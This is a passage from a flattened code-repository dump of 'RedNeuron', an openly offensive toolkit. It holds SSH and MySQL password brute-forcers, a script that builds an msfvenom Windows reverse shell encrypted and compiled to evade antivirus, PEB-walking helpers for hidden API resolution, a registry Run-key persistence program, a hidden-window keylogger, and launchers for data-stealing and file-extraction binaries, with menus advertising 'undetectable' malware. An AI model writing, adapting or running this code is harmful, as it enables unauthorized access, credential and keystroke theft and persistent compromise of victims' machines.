"Database user: "; 28 | cin 
>> user;

    cout << endl << endl;

    vector passwords = readPasswordsFromFile(file);

    SQL sql = SQL(server, user, "a", "mysql");

    for(int i = 0; i < passwords.size(); i++){
        sql.setPassword(passwords[i]);
        result = sql.connect();

        cout << "Password: " << i << "/"<< passwords[i].c_str() << "\r" << flush;
        intentos++;

        if(!result){}
        else{
            cout<< "Password Found: " << passwords[i] << endl;
            break;
        }
    }

    return 0;

}
--------------------------------------------------------------------------------
/code/bruteforce/mysql/utils/ColorClass.h:
--------------------------------------------------------------------------------
#include
#ifndef COLORCLASS_H
#define COLORCLASS_H

using namespace std;

class Colorclass
{
public:
    void red(string text){
        cout << "\033[31m" << text << "\033[0m";
    }
    void blue(string text){
        cout << "\033[34m" << text << "\033[0m";
    }
    void yellow(string text){
        cout << "\033[33m" << text << "\033[0m";
    }
    void black(string text){
        cout << "\033[30m" << text << "\033[0m";
    }
    void green(string text){
        cout << "\033[32m" << text << "\033[0m";
    }
    void cyan(string text){
        cout << "\033[36m" << text << "\033[0m";
    }
};

#endif
--------------------------------------------------------------------------------
/code/bruteforce/mysql/utils/WordlistToVector.h:
--------------------------------------------------------------------------------
#include
#include
#include

using namespace std;

vector readPasswordsFromFile(string fileName) {
    vector passwords;
    ifstream file(fileName);
    if (file.is_open()) {
        string line;
        while (getline(file, line)) {
            passwords.push_back(line);
        }
    }
    else {
        cout << "Error opening file: " << fileName << endl;
    }
    return passwords;
}
--------------------------------------------------------------------------------
/code/bruteforce/mysql/utils/colors.h:
--------------------------------------------------------------------------------
#include
#ifndef COLORCLASS_H
#define COLORCLASS_H

using namespace std;

class Colorclass
{
public:
    void red(string text){
        cout << "\033[31m" << text << "\033[0m";
    }
    void blue(string text){
        cout << "\033[34m" << text << "\033[0m";
    }
    void yellow(string text){
        cout << "\033[33m" << text << "\033[0m";
    }
    void black(string text){
        cout << "\033[30m" << text << "\033[0m";
    }
    void green(string text){
        cout << "\033[32m" << text << "\033[0m";
    }
    void cyan(string text){
        cout << "\033[36m" << text << "\033[0m";
    }
};

#endif
--------------------------------------------------------------------------------
/code/bruteforce/mysql/wordlist.txt:
--------------------------------------------------------------------------------
sdsad
kpassword
asdasd
dsadasd
sad
dsadsad
password
sad
dsad
ewqe
sadsad
asdadsa
passwordx
--------------------------------------------------------------------------------
/code/bruteforce/ssh/.vscode/tasks.json:
--------------------------------------------------------------------------------
{
    "tasks": [
        {
            "type": "cppbuild",
            "label": "C/C++: g++ compilar archivo activo",
            "command": "/usr/bin/g++",
            "args": [
                "-fdiagnostics-color=always",
                "-g",
                "${file}",
                "-o",
                "${fileDirname}/${fileBasenameNoExtension}"
            ],
            "options": {
                "cwd": "${fileDirname}"
            },
            "problemMatcher": [
                "$gcc"
            ],
            "group": {
                "kind": "build",
                "isDefault": true
            },
            "detail": "Tarea generada por el depurador."
        }
    ],
    "version": "2.0.0"
}
--------------------------------------------------------------------------------
/code/bruteforce/ssh/Banner.h:
--------------------------------------------------------------------------------
#include
#include

using namespace std;

int banner(){
    cout << "\033[1;31m"; // This ANSI code changes the text colour to red
    string border(35, '*');
    cout << border << endl;
    string text = "BruteSSH";
    int center = (35 - text.length()) / 2;
    cout << "" << string(center, ' ') << text << string(center, ' ') << "" << endl;
    cout << border << endl;
    cout << "\033[0m"; // This ANSI code restores the default text colour
    return 0;
}
--------------------------------------------------------------------------------
/code/bruteforce/ssh/BruteForce.cpp:
--------------------------------------------------------------------------------
#include
#include
#include
#include
#include "Host.h"
#include "Utils/WordlistToVector.h"
#include "Banner.h"

using namespace std;


int main(){
    ssh_session session;
    int check;
    string ip;
    string user;
    string file;
    cout<>user;
    cout<<"IP: ";
    cin>>ip;
    cout<<"Path of Wordlist: ";
    cin>>file;
    vector passwords = readPasswordsFromFile(file);
    cout<
--------------------------------------------------------------------------------
/code/bruteforce/ssh/Host.cpp:
--------------------------------------------------------------------------------
#include
#include

using namespace std;

class Host{
    string ip;
    int port;
    string user;

    Host(string ip,int port,string user){
    }

};
--------------------------------------------------------------------------------
/code/bruteforce/ssh/Host.h:
--------------------------------------------------------------------------------
#include
#include
#include
#include "Utils/ColorClass.h"


using namespace std;

class SSHHost{
public:
    string ip;
    string user;

    SSHHost(string ip,string user){
        this->ip = ip;
        this->user = user;
    }

    ssh_session SSHConnection(string ip, string user){

        ssh_session session = ssh_new();
        ssh_options_set(session, SSH_OPTIONS_HOST, ip.c_str());

        int rc = ssh_connect(session);
        if (rc != SSH_OK){
            red("\nServer connection unsuccesfull\n");
            cout<<"Error: "<
--------------------------------------------------------------------------------
/code/bruteforce/ssh/Utils/ColorClass.h:
--------------------------------------------------------------------------------
#include
#include

using namespace std;

void red(string text)
{
    cout << "\033[31m" << text << "\033[0m";
}
void blue(string text)
{
    cout << "\033[34m" << text << "\033[0m";
}
void yellow(string text)
{
    cout << "\033[33m" << text << "\033[0m";
}
void black(string text)
{
    cout << "\033[30m" << text << "\033[0m";
}
void green(string text)
{
    cout << "\033[32m" << text << "\033[0m";
}
void cyan(string text)
{
    cout << "\033[36m" << text << "\033[0m";
}
--------------------------------------------------------------------------------
/code/bruteforce/ssh/Utils/WordlistToVector.h:
--------------------------------------------------------------------------------
#include
#include
#include

using namespace std;

vector readPasswordsFromFile(string fileName) {
    vector passwords;
    ifstream file(fileName);
    if (file.is_open()) {
        string line;
        while (getline(file, line)) {
            passwords.push_back(line);
        }
    }
    else {
        cout << "Error opening file: " << fileName << endl;
    }
    return passwords;
}
--------------------------------------------------------------------------------
/code/bruteforce/ssh/bruteSSH:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/bruteforce/ssh/bruteSSH
--------------------------------------------------------------------------------
/code/bruteforce/ssh/wordlist.txt:
--------------------------------------------------------------------------------
dsdsad
fadsad
dsad
as12
aas12
sadasfd
dafa
s12
sdasd
dsad
dsadas
sads12
sdsadas
dsadds

--------------------------------------------------------------------------------
/code/checks.sh:
--------------------------------------------------------------------------------
#!/bin/bash

RED="\e[31m"
GREEN="\e[32m"
YELLOW="\e[33m"
BLUE="\e[34m"
ENDCOLOR="\e[0m"

echo -e "${YELLOW}[+] Checking Dependencies...${ENDCOLOR}\n"

which x86_64-w64-mingw32-g++ >/dev/null
a=$(echo $?)


if [ $a == 0 ]; then
    echo -e "${GREEN}[+] Compiler Found ${ENDCOLOR}"
else
    echo -e "${RED}[-] Compiler not Found${ENDCOLOR}"
    echo -e "You can install with: sudo apt-get install g++-mingw-w64"
    exit
fi

which msfvenom >/dev/null
b=$(echo $?)

if [ $b == 0 ]; then
    echo -e "${GREEN}[+] Payload Creator Found ${ENDCOLOR}"
else
    echo -e "${RED}[-] Payload Creator not Found${ENDCOLOR}"
    echo -e "You can install following this guide: https://adamtheautomator.com/install-metasploit-on-ubuntu/"
    exit
fi

which python2 >/dev/null
c=$(echo $?)

if [ $c == 0 ]; then
    echo -e "${GREEN}[+] Python2 Found ${ENDCOLOR}"
else
    echo -e "${RED}[-] Python2 not Found${ENDCOLOR}"
    exit
fi

sleep 3s
clear

--------------------------------------------------------------------------------
/code/create.h:
--------------------------------------------------------------------------------
#include

using namespace std;

void createrevshell()
{
    cout << endl;
    system("bash code/msfvenom.sh");
}

void createpersistence(){
    string exe;
    string command;
    yellow("\n[+] Provide name of EXE you want to be persistent (include .exe)\n");
    cyan("\nEXE = ");
    cin >> exe;
    command = "sed -i 's/REPLACE/\"" + exe + "\"/' code/persistence/runkeys2.cpp >/dev/null";
    const int commandlength = command.length();
    char* char_command = new char[commandlength + 1];
    strcpy(char_command, command.c_str());
    system("cp code/persistence/runkeys.cpp code/persistence/runkeys2.cpp");
    system(char_command);
    system("bash code/persistence/check.sh");
}

void createproclist(){
    system("bash code/proclist/proclist.sh");
}

void createWindowInjector(){
    system("bash code/WindowInjector/WindowsInjector.sh");
}
--------------------------------------------------------------------------------
/code/helpers.cpp:
--------------------------------------------------------------------------------
#include "PEstructs.h"
#include "helpers.h"
#include

typedef HMODULE (WINAPI * LoadLibrary_t)(LPCSTR lpFileName);
LoadLibrary_t pLoadLibraryA = NULL;



HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName) {

    // get the offset of Process Environment Block
#ifdef _M_IX86
    PEB * ProcEnvBlk = (PEB *) __readfsdword(0x30);
#else
    PEB * ProcEnvBlk = (PEB *)__readgsqword(0x60);
#endif

    // return base address of a calling module
    if (sModuleName == NULL)
        return (HMODULE) (ProcEnvBlk->ImageBaseAddress);

    PEB_LDR_DATA * Ldr = ProcEnvBlk->Ldr;
    LIST_ENTRY * ModuleList = NULL;

    ModuleList = &Ldr->InMemoryOrderModuleList;
    LIST_ENTRY * pStartListEntry = ModuleList->Flink;

    for (LIST_ENTRY * pListEntry = pStartListEntry;     // start from beginning of InMemoryOrderModuleList
         pListEntry != ModuleList;                       // walk all list entries
         pListEntry = pListEntry->Flink) {

        // get current Data Table Entry
        LDR_DATA_TABLE_ENTRY * pEntry = (LDR_DATA_TABLE_ENTRY *) ((BYTE *) pListEntry - sizeof(LIST_ENTRY));

        // check if module is found and return its base address
        if (lstrcmpiW(pEntry->BaseDllName.Buffer, sModuleName) == 0)
            return (HMODULE) pEntry->DllBase;
    }

    // otherwise:
    return NULL;

}

FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char * sProcName) {

    char * pBaseAddr = (char *) hMod;

    // get pointers to main headers/structures
    IMAGE_DOS_HEADER * pDosHdr = (IMAGE_DOS_HEADER *) pBaseAddr;
    IMAGE_NT_HEADERS * pNTHdr = (IMAGE_NT_HEADERS *) (pBaseAddr + pDosHdr->e_lfanew);
    IMAGE_OPTIONAL_HEADER * pOptionalHdr = &pNTHdr->OptionalHeader;
    IMAGE_DATA_DIRECTORY * pExportDataDir = (IMAGE_DATA_DIRECTORY *) (&pOptionalHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
    IMAGE_EXPORT_DIRECTORY * pExportDirAddr = (IMAGE_EXPORT_DIRECTORY *) (pBaseAddr + pExportDataDir->VirtualAddress);

    // resolve addresses to Export Address Table, table of function names and "table of ordinals"
    DWORD * pEAT = (DWORD *) (pBaseAddr + pExportDirAddr->AddressOfFunctions);
    DWORD * pFuncNameTbl = (DWORD *) (pBaseAddr + pExportDirAddr->AddressOfNames);
    WORD * pHintsTbl = (WORD *) (pBaseAddr + pExportDirAddr->AddressOfNameOrdinals);

    // function address we're looking for
    void *pProcAddr = NULL;

    // resolve function by ordinal
    if (((DWORD_PTR)sProcName >> 16) == 0) {
        WORD ordinal = (WORD) sProcName & 0xFFFF;   // convert to WORD
        DWORD Base = pExportDirAddr->Base;          // first ordinal number

        // check if ordinal is not out of scope
        if (ordinal < Base || ordinal >= Base + pExportDirAddr->NumberOfFunctions)
            return NULL;

        // get the function virtual address = RVA + BaseAddr
        pProcAddr = (FARPROC) (pBaseAddr + (DWORD_PTR) pEAT[ordinal - Base]);
    }
    // resolve function by name
    else {
        // parse through table of function names
        for (DWORD i = 0; i < pExportDirAddr->NumberOfNames; i++) {
            char * sTmpFuncName = (char *) pBaseAddr + (DWORD_PTR) pFuncNameTbl[i];

            if (strcmp(sProcName, sTmpFuncName) == 0) {
                // found, get the function virtual address = RVA + BaseAddr
                pProcAddr = (FARPROC) (pBaseAddr + (DWORD_PTR) pEAT[pHintsTbl[i]]);
                break;
            }
        }
    }

    // check if found VA is forwarded to external library.function
    if ((char *) pProcAddr >= (char *) pExportDirAddr &&
        (char *) pProcAddr < (char *) (pExportDirAddr + pExportDataDir->Size)) {

        char * sFwdDLL = _strdup((char *) pProcAddr);    // get a copy of library.function string
        if (!sFwdDLL) return NULL;

        // get external function name
        char * sFwdFunction = strchr(sFwdDLL, '.');
        *sFwdFunction = 0;    // set trailing null byte for external library name -> library\x0function
        sFwdFunction++;       // shift a pointer to the beginning of function name

        // resolve LoadLibrary function pointer, keep it as global variable
        if (pLoadLibraryA == NULL) {
            pLoadLibraryA = (LoadLibrary_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "LoadLibraryA");
            if (pLoadLibraryA == NULL) return NULL;
        }

        // load the external library
        HMODULE hFwd = pLoadLibraryA(sFwdDLL);
        free(sFwdDLL);    // release the allocated memory for lib.func string copy
        if (!hFwd) return NULL;

        // get the address of function the original call is forwarded to
        pProcAddr = hlpGetProcAddress(hFwd, sFwdFunction);
    }

    return (FARPROC) pProcAddr;
}

--------------------------------------------------------------------------------
/code/helpers.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include

HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName);
FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char * sProcName);

--------------------------------------------------------------------------------
/code/mainshell.h:
--------------------------------------------------------------------------------
#include
#include
#include "create.h"

using namespace std;

string op;

int mainshell(){
    op = "a";
    while (op != "exit" && op != "Exit" && op != "EXIT" ){
        cout<<"\nRedNeuron@main-> ";
        cin>>op;
        if (op == "create" || op == "Create" || op == "CREATE"){
            createshell();
        }
        if (op == "create help" || op == "Create Help" || op == "CREATE HELP"){
            //createmenu();
        }
        if (op == "create list" || op == "Create List" || op == "CREATE LIST"){
            listcreate();
        }
        if (op == "create revshell" || op == "Create Revshell" || op == "CREATE REVSHELL"){
            createrevshell();
        }
        if (op == "clear" || op == "Clear" || op == "CLEAR"){
            system("clear");
        }
        if (op == "help" || op == "Help" || op == "HELP"){
            helpmenu();
        }
        if (op == "list" || op == "List" || op == "LIST"){
            commandsmenu();
        }
        if (op == "commands" || op == "Commands" || op == "COMMANDS"){
            commandsmenu();
        }
        if (op == "create reverse shell" || op == "Create Reverse Shell" || op == "CREATE REVERSE SHELL"){
            createrevshell();
        }
    }
    green("\nBye Bye :)");
    return 0;
}
--------------------------------------------------------------------------------
/code/menus.h:
--------------------------------------------------------------------------------
#include
#include "ColorClass.h"

using namespace std;

int mainmenu() {
    yellow("\t RedNeuron\n");
    yellow("\t Author S12 -> salsa");
    yellow("\n\t Version 1.7 ");
    return 0;
}

void helpmenu(){
    cyan("\nHELP MENU\n");
    red("Disclaimer: Im not responsable of the use for this tool\n");
    cyan("\nDeveloped with: C++ - Python - Bash\nVersion 1.7\n\nGithub: https://github.com/S12cybersecurity/RedNeuron\nMedium: https://medium.com/@s12deff\n\nCommands:\n- help -> List this Menu\n- list -> List available commands\n- commands -> List available commands\n- create -> Section to Create available Malware\n- bruteforce -> Section to perform bruteforce attacks\n- postexploitation -> Section to create PostExplotation Malware\n- clear -> Clear actual screen\n");
}

void commandsmenu(){
    cyan("\nCommands:\n- help -> List this Menu\n- list -> List available commands\n- commands -> List available commands\n- create -> Section to Create available Malware\n- bruteforce -> Section to perform bruteforce attacks\n- clear -> Clear actual screen\n");
}

void createcommands(){
    cyan("\nShell Commands:\n- help -> Show Help Menu\n- list -> List all malware available \n- commands -> List available commands\n- clear -> Clear actual screen\n\nMalware Commands:\n- reverse shell -> Create Undetectable Windows Reverse Shell\n- revshell -> Create Undetectable Windows Reverse Shell\n- persistence -> Create EXE to get Persistence in Windows Victim\n- proclist -> Create EXE to list all active processes (Name,PID,Parent PID,User Running it)\n- windowinjector -> Create EXE to inject Reverse Shell into a process via Window Name\n");
}

void createmenu() {
    cyan("\nHelp Menu for Create\nIf you want to see all malware available execute 'list' command \n\nCreate Section in RedNeuron allow you to use this commands:\n\nShell Commands:\n- help -> Show Help Menu\n- list -> List all malware available \n- commands -> List available commands\n- clear -> Clear actual screen\n\nMalware Commands:\n- reverse shell -> Create Undetectable Windows Reverse Shell\n- revshell -> Create Undetectable Windows Reverse Shell\n- persistence -> Create EXE to get Persistence in Windows Victim\n- proclist -> Create EXE to list all active processes (Name,PID,Parent PID,User Running it)\n- windownjector -> Reverse Shell Injected in a Process via Window Name\n");
}

void listcreate(){
    cyan("\nYou can create this malware options:\n- Reverse Shell to Bypass Windows Defender (Command 'revshell' or 'reverse shell')\n- EXE to get Persistence in Windows Victim (Command 'persistence')\n- proclist -> Create EXE to list all active processes [Name,PID,Parent PID,User Running it] (Command 'proclist')\n- windowinjector -> Create EXE to inject Reverse Shell into a process via Window Name\n");
}

void bruteforcemenu(){
    cyan("\nBruteforce Shell Commands:\n- ssh -> Execute SSH Server Bruteforce\n- mysql -> Execute MySQL Bruteforce\n- help -> Display this menu\n- commands -> Display available commands\n- list -> List bruteforce victim options\n- exit -> Exit from RedNeuron\n");
}

void bruteforcelist(){
    cyan("\nList Bruteforce Attack Options:\n- SSH\n- MySQL\n");
}

void postexploitationmenu(){
    cyan("\nPost Exploitation Commands:\n- help -> Display this menu\n- commands -> Display available commands\n- list -> List post exploitation options\n- file-extractor -> Extract Files from Windows to RedNeuron (Linux)\n- mysql-stealer -> Steal MySQL Data\n- keylogger -> Store in file all keys pressed by user\n- exit -> Exit from RedNeuron\n");
}

bool checkdependeces(){
    system("bash code/checks.sh");
    return true;
}

--------------------------------------------------------------------------------
/code/msfvenom.sh:
--------------------------------------------------------------------------------
#!/bin/bash

RED="\e[31m"
GREEN="\e[32m"
YELLOW="\e[33m"
BLUE="\e[34m"
ENDCOLOR="\e[0m"

echo -e "${YELLOW}[+] Create Undetectable Windows Reverse Shell\nProvide the following information about YOUR attacker machine${ENDCOLOR}\n"
printf "IP = "
read -r ip
printf "PORT = "
read -r port
printf "PATH to save shell = "
read -r shellpath



echo -e ""
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ip LPORT=$port -f raw -o $shellpath/temp.raw >/dev/null
cp code/revshell.cpp code/revshell2.cpp 2>/dev/null
sudo python2 code/aesencrypt.py $shellpath/temp.raw >/dev/null
x86_64-w64-mingw32-g++ code/revshell2.cpp code/helpers.cpp -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -o $shellpath/shell.exe -fpermissive 2/dev/null
e=$(echo $?)

if [ $e == 0 ]; then
    echo -e "${GREEN}[+] Shell Created Successfully - $shellpath/shell.exe${ENDCOLOR}"
else
    echo -e "${RED}[-] Error Creating Shell${ENDCOLOR}\n"
    exit
fi

--------------------------------------------------------------------------------
/code/persistence/check.sh:
--------------------------------------------------------------------------------
#!/bin/bash

RED="\e[31m"
GREEN="\e[32m"
YELLOW="\e[33m"
BLUE="\e[34m"
CYAN="\e[36m"


ENDCOLOR="\e[0m"



printf "${CYAN}\nPATH to save EXE = ${ENDCOLOR}"
read -r exepath
x86_64-w64-mingw32-g++ code/persistence/runkeys2.cpp -I/usr/share/mingw-w64/include/ -o $exepath/runkeys.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -Wmain

ls $exepath/runkeys.exe >/dev/null
e=$(echo $?)

if [ $e == 0 ]; then
    echo -e "${GREEN}\n[+] File Created Successfully - runkeys.exe${ENDCOLOR}"
else
    echo -e "${RED}[-] Error Creating File${ENDCOLOR}\n"
    exit
fi
--------------------------------------------------------------------------------
/code/persistence/runkeys.cpp:
--------------------------------------------------------------------------------
#include
#include
#include
#include

char* tita;
const char* exe;
const char* exe2;

using namespace std;

int main() {
    exe = REPLACE;
    HKEY hkey = NULL;
    LONG res = RegOpenKeyEx(HKEY_CURRENT_USER,(LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hkey);
    if (res == ERROR_SUCCESS) {
        RegSetValueEx(hkey,(LPCSTR)"salsa", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
        RegCloseKey(hkey);
    }
}





--------------------------------------------------------------------------------
/code/persistence/runkeys2.cpp:
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char* tita; 7 | const char* exe; 8 | const char* exe2; 9 | 10 | using namespace std; 11 | 12 | int main() { 13 | exe = "calc.exe"; 14 | HKEY hkey = NULL; 15 | LONG res = RegOpenKeyEx(HKEY_CURRENT_USER,(LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hkey); 16 | if (res == ERROR_SUCCESS) { 17 | RegSetValueEx(hkey,(LPCSTR)"salsa", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 18 | RegCloseKey(hkey); 19 | } 20 | } 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/MySQL_DataStealer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | ENDCOLOR="\e[0m" 7 | 8 | cp code/postexploitation/MySQL-dataStealer/cg.exe . 9 | cp code/postexploitation/MySQL-dataStealer/libmysql.dll . 10 | cp code/postexploitation/MySQL-dataStealer/sqlop.exe . 11 | 12 | echo -e "${GREEN}\n[*]${ENDCOLOR} Creating cg.exe" 13 | echo -e "${GREEN}[*]${ENDCOLOR} Creating libmysql.dll" 14 | echo -e "${GREEN}[*]${ENDCOLOR} Creating sqlop.exe" 15 | 16 | echo -e "${GREEN}\n[*]${ENDCOLOR} Done!\n\nIn your current directory you will find the created files.\n\n[!] 
To use this tool you can follow the instructions in this article:\nLink: https://medium.com/@s12deff/mysql-data-stealer-hacking-mysql-26b960bb7d10\n" 17 | 18 | ./code/postexploitation/MySQL-dataStealer/server 19 | -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/cg.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/MySQL-dataStealer/cg.exe -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/libmysql.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/MySQL-dataStealer/libmysql.dll -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/MySQL-dataStealer/server -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/sqlop.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/MySQL-dataStealer/sqlop.exe -------------------------------------------------------------------------------- /code/postexploitation/file-extractor/client: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/file-extractor/client -------------------------------------------------------------------------------- /code/postexploitation/file-extractor/file-extractor.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | ENDCOLOR="\e[0m" 7 | 8 | 9 | cp code/postexploitation/file-extractor/fileExtractor.exe . 10 | 11 | echo -e "${GREEN}\n[*]${ENDCOLOR} Creating fileExtractor.exe" 12 | echo -e "${GREEN}[*]${ENDCOLOR} Done!" 13 | 14 | ./code/postexploitation/file-extractor/server 15 | 16 | 17 | echo -e "${GREEN}\n[*]${ENDCOLOR} Executing client to receive files" 18 | echo -e "${GREEN}[*]${ENDCOLOR} Done!" -------------------------------------------------------------------------------- /code/postexploitation/file-extractor/fileExtractor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/file-extractor/fileExtractor.exe -------------------------------------------------------------------------------- /code/postexploitation/file-extractor/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/file-extractor/server -------------------------------------------------------------------------------- /code/postexploitation/keylogger/keylogger.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // hook 6 | LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) { 7 | if (nCode == HC_ACTION && wParam == WM_KEYDOWN) { 8 | DWORD vkCode = 
((KBDLLHOOKSTRUCT*)lParam)->vkCode; 9 | 10 | FILE* file; 11 | fopen_s(&file, "C:\\Users\\Public\\Music\\log.txt", "a"); 12 | if (file != NULL) { 13 | fprintf(file, "%c", vkCode); 14 | fclose(file); 15 | } 16 | } 17 | return CallNextHookEx(NULL, nCode, wParam, lParam); 18 | } 19 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 20 | // creating invisible window 21 | AllocConsole(); 22 | ShowWindow(GetConsoleWindow(), SW_HIDE); 23 | 24 | // set hook 25 | HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, 0); 26 | 27 | // wait for events 28 | MSG msg; 29 | while (GetMessage(&msg, NULL, 0, 0) > 0) { 30 | TranslateMessage(&msg); 31 | DispatchMessage(&msg); 32 | } 33 | // delete hook 34 | UnhookWindowsHookEx(hook); 35 | return 0; 36 | } 37 | -------------------------------------------------------------------------------- /code/postexploitation/keylogger/keylogger.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/keylogger/keylogger.exe -------------------------------------------------------------------------------- /code/postexploitation/keylogger/keylogger.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | ENDCOLOR="\e[0m" 7 | 8 | echo -e "${GREEN}[*]${ENDCOLOR} Creating keylogger..." 9 | 10 | cp code/postexploitation/keylogger/keylogger.exe . 11 | 12 | echo -e "${GREEN}[*]${ENDCOLOR} Done!" 
13 | 14 | -------------------------------------------------------------------------------- /code/postexploitation/postExpShell.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/postExpShell.h -------------------------------------------------------------------------------- /code/proclist/ProcList.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "conio.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "ColorClass.h" 12 | 13 | void PrintProcessNameAndID(DWORD processID) { 14 | TCHAR szProcessName[MAX_PATH] = TEXT(""); 15 | 16 | // Get a handle to the process. 17 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID); 18 | 19 | // Get the process name. 20 | if (NULL != hProcess) { 21 | HMODULE hMod; 22 | DWORD cbNeeded; 23 | 24 | if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) { 25 | GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)); 26 | } 27 | } 28 | 29 | // Get the parent process ID 30 | DWORD parentProcessID = 0; 31 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 32 | if (hSnapshot != INVALID_HANDLE_VALUE) { 33 | PROCESSENTRY32 pe32; 34 | pe32.dwSize = sizeof(PROCESSENTRY32); 35 | 36 | if (Process32First(hSnapshot, &pe32)) { 37 | do { 38 | if (pe32.th32ProcessID == processID) { 39 | parentProcessID = pe32.th32ParentProcessID; 40 | break; 41 | } 42 | } while (Process32Next(hSnapshot, &pe32)); 43 | } 44 | CloseHandle(hSnapshot); 45 | } 46 | 47 | // Get the username of the process owner 48 | HANDLE hToken; 49 | if (OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) { 50 | DWORD cbTokenUser = 0; 51 | GetTokenInformation(hToken, TokenUser, NULL, 0, &cbTokenUser); 52 | 
std::vector userInfo(cbTokenUser); 53 | if (GetTokenInformation(hToken, TokenUser, userInfo.data(), cbTokenUser, &cbTokenUser)) { 54 | SID_NAME_USE SidType; 55 | TCHAR lpName[UNLEN + 1]; 56 | DWORD cchName = UNLEN + 1; 57 | TCHAR lpReferencedDomainName[UNLEN + 1]; 58 | DWORD cchReferencedDomainName = UNLEN + 1; 59 | if (LookupAccountSid(NULL, reinterpret_cast(userInfo.data())->User.Sid, lpName, &cchName, lpReferencedDomainName, &cchReferencedDomainName, &SidType)) { 60 | printf("Process name: "); 61 | std::wcout << szProcessName << std::endl; 62 | printf("Process ID: "); 63 | std::wcout << processID << std::endl; 64 | printf("Parent Process ID: "); 65 | std::wcout << parentProcessID << std::endl; 66 | printf("User name: "); 67 | std::wcout << lpName << std::endl; 68 | CloseHandle(hProcess); 69 | CloseHandle(hToken); 70 | } 71 | } 72 | } 73 | } 74 | int main() { 75 | DWORD aProcesses[1024], cbNeeded, cProcesses; 76 | unsigned int i; 77 | 78 | // Get the list of process identifiers. 79 | if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) { 80 | return 1; 81 | } 82 | 83 | // Calculate how many process identifiers were returned. 84 | cProcesses = cbNeeded / sizeof(DWORD); 85 | 86 | // Print the name and process identifier for each process. 
